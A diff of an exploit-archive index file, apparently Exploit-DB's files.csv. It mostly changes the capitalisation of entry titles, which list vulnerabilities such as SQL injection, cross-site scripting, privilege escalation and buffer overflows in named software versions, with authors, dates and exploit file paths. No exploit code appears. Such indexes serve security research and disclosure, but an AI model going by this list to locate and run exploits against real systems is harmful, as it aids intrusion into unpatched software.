- manuals_search.php manuals_search Parameter Cross-Site Scripting",2008-12-29,"Xia Shing Zee",php,webapps,0 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 - CDATA HTML Injection",2008-12-29,system_meltdown,multiple,remote,0 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal - 'haber.asp' SQL Injection",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 @@ -29474,7 +29475,7 @@ id,file,description,date,author,platform,type,port 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro - 'main.php' SQL Injection",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure",2009-01-05,"Aditya K Sood",windows,remote,0 32700,platforms/linux/local/32700.rb,"ibstat $PATH - Privilege Escalation",2014-04-04,Metasploit,linux,local,0 -32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 +32701,platforms/php/webapps/32701.txt,"WordPress XCloner Plugin 3.1.0 - Cross-Site Request Forgery",2014-04-04,"High-Tech Bridge SA",php,webapps,80 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2 (build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80 32703,platforms/ios/webapps/32703.txt,"Private Photo+Video 1.1 Pro iOS - Persistent Exploit",2014-04-05,Vulnerability-Lab,ios,webapps,0 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS)",2014-04-05,LiquidWorm,windows,dos,0 @@ -29484,7 +29485,7 @@ id,file,description,date,author,platform,type,port 32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 -32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service",2009-01-08,Erik,multiple,dos,0 +32712,platforms/multiple/dos/32712.txt,"IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service",2009-01-08,Erik,multiple,dos,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 32714,platforms/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injections",2009-01-12,"Joseph Giron",php,webapps,0 32715,platforms/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos,0 @@ -29504,12 +29505,12 @@ id,file,description,date,author,platform,type,port 32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness / Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 32735,platforms/asp/webapps/32735.txt,"Blog Manager - inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 -32736,platforms/asp/webapps/32736.txt,"Blog Manager - inc_webblogmanager.asp CategoryID Parameter Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 +32736,platforms/asp/webapps/32736.txt,"Blog Manager - inc_webblogmanager.asp categoryId Parameter Cross-Site Scripting",2009-01-16,Pouya_Server,asp,webapps,0 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0 32738,platforms/ios/remote/32738.txt,"Bluetooth Text Chat 1.0 iOS - Code Execution",2014-04-08,Vulnerability-Lab,ios,remote,0 32740,platforms/linux/dos/32740.txt,"QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service",2009-01-19,kokanin,linux,dos,0 -32741,platforms/jsp/webapps/32741.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 -32742,platforms/jsp/webapps/32742.txt,"Apache Jackrabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 +32741,platforms/jsp/webapps/32741.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - search.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 +32742,platforms/jsp/webapps/32742.txt,"Apache JackRabbit 1.4/1.5 Content Repository (JCR) - swr.jsp q Parameter Cross-Site Scripting",2009-01-20,"Red Hat",jsp,webapps,0 32743,platforms/hardware/remote/32743.txt,"Halon Security Router (SR) 3.2-winter-r1 - Multiple Security Vulnerabilities",2014-04-08,"Juan Manuel Garcia",hardware,remote,0 32745,platforms/multiple/remote/32745.py,"OpenSSL TLS Heartbeat Extension - Memory Disclosure",2014-04-08,"Jared Stafford",multiple,remote,443 32746,platforms/cgi/webapps/32746.txt,"MoinMoin 1.8 - 'AttachFile.py' Cross-Site Scripting",2009-01-20,SecureState,cgi,webapps,0 @@ -29520,7 +29521,7 @@ id,file,description,date,author,platform,type,port 32751,platforms/linux/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",linux,local,0 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing",2014-04-08,Metasploit,windows,local,0 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm - Unauthenticated Command Injection",2014-04-08,Metasploit,hardware,remote,0 -32754,platforms/osx/dos/32754.c,"Mac OSX 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 +32754,platforms/osx/dos/32754.c,"Apple Mac OS X 10.9 - Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32757,platforms/php/webapps/32757.txt,"ConPresso CMS 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 @@ -29531,13 +29532,13 @@ id,file,description,date,author,platform,type,port 32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - Username Enumeration",2009-01-27,"Marco Mella",multiple,remote,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 -32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI Redirection",2009-01-28,buzzy,php,webapps,0 +32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI redirection",2009-01-28,buzzy,php,webapps,0 32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilities",2014-04-09,"Shpend Kurtishaj",php,webapps,0 32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution",2009-01-29,Perforin,cgi,webapps,0 -32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' Webserver Denial Of Service",2009-01-30,strategma,php,dos,0 +32769,platforms/php/dos/32769.php,"PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial Of Service",2009-01-30,strategma,php,dos,0 32770,platforms/php/webapps/32770.txt,"E-PHP B2B Trading Marketplace Script - Multiple Cross-Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Privilege Escalation",2009-02-02,"Ruben Santamarta ",windows,local,0 -32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 +32772,platforms/windows/dos/32772.py,"Nokia MultiMedia Player 1.1 - '.m3u' Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 @@ -29566,7 +29567,7 @@ id,file,description,date,author,platform,type,port 32799,platforms/windows/remote/32799.html,"Nokia Phoenix 2008.4.7 Service Software - ActiveX Controls Multiple Buffer Overflow Vulnerabilities",2009-02-10,MurderSkillz,windows,remote,0 32800,platforms/linux/dos/32800.txt,"Poppler 0.10.3 - Multiple Denial of Service Vulnerabilities",2009-02-12,Romario,linux,dos,0 32801,platforms/hardware/remote/32801.txt,"Barracuda Load Balancer - 'realm' Parameter Cross-Site Scripting",2009-02-05,"Jan Skovgren",hardware,remote,0 -32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 +32802,platforms/php/webapps/32802.txt,"Clipbucket 1.7 - 'dwnld.php' Directory Traversal",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar - 'eventid' Parameter SQL Injection",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 @@ -29589,7 +29590,7 @@ id,file,description,date,author,platform,type,port 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 - Language File Parsing Buffer Overflow",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 - Long Response Packet Remote Cache Poisoning",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider - ActiveX Control 'write()' Arbitrary File Overwrite",2009-03-02,"Amir Zangeneh",windows,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OSX Lion Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 +32813,platforms/osx/local/32813.c,"Apple Mac OS X (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation",2014-04-11,"Kenzley Alphonse",osx,local,0 32827,platforms/php/webapps/32827.txt,"Afian - 'includer.php' Directory Traversal",2009-03-02,vnbrain.net,php,webapps,0 32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass",2009-03-02,"Chris Evans",linux,local,0 @@ -29598,11 +29599,11 @@ id,file,description,date,author,platform,type,port 32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 - 'DtbClsLogin()' Remote Stack Buffer Overflow",2009-03-02,"AbdulAziz Hariri",windows,remote,0 32833,platforms/asp/webapps/32833.txt,"Blogsa 1.0 - 'Widgets.aspx' Cross-Site Scripting",2009-03-02,DJR,asp,webapps,0 32834,platforms/linux/remote/32834.txt,"cURL/libcURL 7.19.3 - HTTP 'Location:' Redirect Security Bypass",2009-03-03,"David Kierznowski",linux,remote,0 -32835,platforms/php/webapps/32835.txt,"NovaBoard 1.0 - HTML Injection / Cross-Site Scripting",2009-03-03,"Jose Luis Zayas",php,webapps,0 +32835,platforms/php/webapps/32835.txt,"Novaboard 1.0 - HTML Injection / Cross-Site Scripting",2009-03-03,"Jose Luis Zayas",php,webapps,0 32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos,0 32837,platforms/linux/remote/32837.py,"Wesnoth 1.x - PythonAI Remote Code Execution",2009-02-25,Wesnoth,linux,remote,0 32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 - XPath Expression Remote Denial Of Service",2009-02-14,"Shane Bester",linux,dos,0 -32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 +32839,platforms/multiple/remote/32839.txt,"IBM Websphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 32840,platforms/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,php,webapps,0 32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",php,webapps,0 32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Parameter Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps,0 @@ -29624,14 +29625,14 @@ id,file,description,date,author,platform,type,port 32858,platforms/java/webapps/32858.txt,"Sun Java System Messenger Express 6.3-0.15 - 'error' Parameter Cross-Site Scripting",2009-03-17,syniack,java,webapps,0 32859,platforms/hardware/webapps/32859.txt,"Sagem Fast 3304-V2 - Authentication Bypass",2014-04-14,"Yassin Aboukir",hardware,webapps,0 32860,platforms/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",java,dos,0 -32861,platforms/php/webapps/32861.txt,"Wordpress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 +32861,platforms/php/webapps/32861.txt,"WordPress Theme LineNity 1.20 - Local File Inclusion",2014-04-14,"felipe andrian",php,webapps,0 32862,platforms/java/webapps/32862.txt,"Sun Java System Calendar Server 6 - 'command.shtml' Cross-Site Scripting",2009-03-31,"SCS team",java,webapps,0 32863,platforms/java/webapps/32863.txt,"Sun Java System Communications Express 6.3 - 'search.xml' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32864,platforms/java/webapps/32864.txt,"Sun Java System Communications Express 6.3 - 'UWCMain' Cross-Site Scripting",2009-05-20,"SCS team",java,webapps,0 32865,platforms/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",multiple,dos,0 32866,platforms/ios/webapps/32866.txt,"PDF Album 1.7 iOS - File Include Web",2014-04-14,Vulnerability-Lab,ios,webapps,0 -32867,platforms/php/webapps/32867.txt,"Wordpress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 -32868,platforms/php/webapps/32868.txt,"Wordpress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32867,platforms/php/webapps/32867.txt,"WordPress Quick Page/Post Redirect Plugin 5.0.3 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 +32868,platforms/php/webapps/32868.txt,"WordPress Twitget Plugin 3.3.1 - Multiple Vulnerabilities",2014-04-14,"Tom Adams",php,webapps,80 32869,platforms/linux/webapps/32869.rb,"eScan Web Management Console - Command Injection",2014-04-14,Metasploit,linux,webapps,10080 32870,platforms/cgi/webapps/32870.txt,"AWStats 6.4 - 'AWStats.pl' Multiple Full Path Disclosure",2009-04-19,r0t,cgi,webapps,0 32871,platforms/php/webapps/32871.txt,"ExpressionEngine 1.6 - Avtaar Name HTML Injection",2009-03-22,"Adam Baldwin",php,webapps,0 @@ -29654,14 +29655,14 @@ id,file,description,date,author,platform,type,port 32889,platforms/php/webapps/32889.txt,"4CMS - SQL Injection / Local File Inclusion",2009-04-02,k1ll3r_null,php,webapps,0 32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/2003/Vista/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 -32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 -32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 - Login username Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 - private/file_management.ssi PATH Parameter Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0 +32894,platforms/multiple/webapps/32894.txt,"IBM Bladecenter Advanced Management Module 1.42 - Login username Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32895,platforms/multiple/webapps/32895.txt,"IBM Bladecenter Advanced Management Module 1.42 - private/file_Management.ssi PATH Parameter Cross-Site Scripting",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32896,platforms/multiple/webapps/32896.html,"IBM Bladecenter Advanced Management Module 1.42 - Cross-Site Request Forgery",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager - Cross-Site Scripting / HTML Injection",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection",2009-04-09,"ThE g0bL!N",asp,webapps,0 32899,platforms/windows/dos/32899.py,"Jzip - SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 -32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 +32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0 32902,platforms/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",windows,dos,0 32903,platforms/asp/webapps/32903.txt,"People-Trak - Login SQL Injection",2009-04-13,Mormoroth.net,asp,webapps,0 32905,platforms/php/webapps/32905.txt,"LinPHA 1.3.2/1.3.3 - 'login.php' Cross-Site Scripting",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 @@ -29717,7 +29718,7 @@ id,file,description,date,author,platform,type,port 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 -33337,platforms/osx/dos/33337.c,"Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 +33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML Injection / Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 - Security Bypass",2009-04-29,J.Greil,cgi,remote,0 @@ -29729,20 +29730,20 @@ id,file,description,date,author,platform,type,port 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 33077,platforms/linux/dos/33077.c,"MySQL 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0 -32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32971,platforms/multiple/remote/32971.txt,"GlassFish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 -32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 -32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 - Admin Console /configuration/auditModuleEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 -32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 - Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32978,platforms/multiple/remote/32978.txt,"GlassFish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32974,platforms/multiple/remote/32974.txt,"GlassFish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32975,platforms/multiple/remote/32975.txt,"GlassFish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 +32977,platforms/multiple/remote/32977.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32979,platforms/multiple/remote/32979.txt,"GlassFish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32980,platforms/multiple/remote/32980.txt,"GlassFish Enterprise Server 2.1 - Admin Console /configuration/auditModuleEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32981,platforms/multiple/remote/32981.txt,"GlassFish Enterprise Server 2.1 - Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - (sorter.php sorter_value parameter) SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - (sorter.php sorter_value Parameter) SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 @@ -29760,11 +29761,11 @@ id,file,description,date,author,platform,type,port 33000,platforms/php/webapps/33000.txt,"Cacti 0.8.7 - 'data_input.php' Cross-Site Scripting",2009-05-15,fgeek,php,webapps,0 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site Scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 - Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 -33003,platforms/php/webapps/33003.txt,"Wordpress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read parameter) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read Parameter) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 -33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 -33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess - Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 +33006,platforms/php/webapps/33006.txt,"Alienvault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 +33007,platforms/multiple/remote/33007.txt,"Novell Groupwise 8.0 Webaccess - Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 33008,platforms/php/webapps/33008.txt,"LxBlog - Multiple Cross-Site Scripting / SQL Injection",2009-05-22,Securitylab.ir,php,webapps,0 33009,platforms/asp/webapps/33009.txt,"DotNetNuke 4.9.3 - 'ErrorPage.aspx' Cross-Site Scripting",2009-05-22,"ben hawkes",asp,webapps,0 33010,platforms/hardware/remote/33010.txt,"SonicWALL Global VPN Client 4.0 - Log File Remote Format String",2009-05-26,lofi42,hardware,remote,0 @@ -29814,12 +29815,12 @@ id,file,description,date,author,platform,type,port 33055,platforms/hardware/remote/33055.html,"Cisco ASA Appliance 8.x - WebVPN DOM Wrapper Cross-Site Scripting",2009-05-24,"Trustwave's SpiderLabs",hardware,remote,0 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - SEH Overflow (PoC)",2014-04-27,st3n,windows,dos,0 33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 -33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - .Playlist File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 +33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 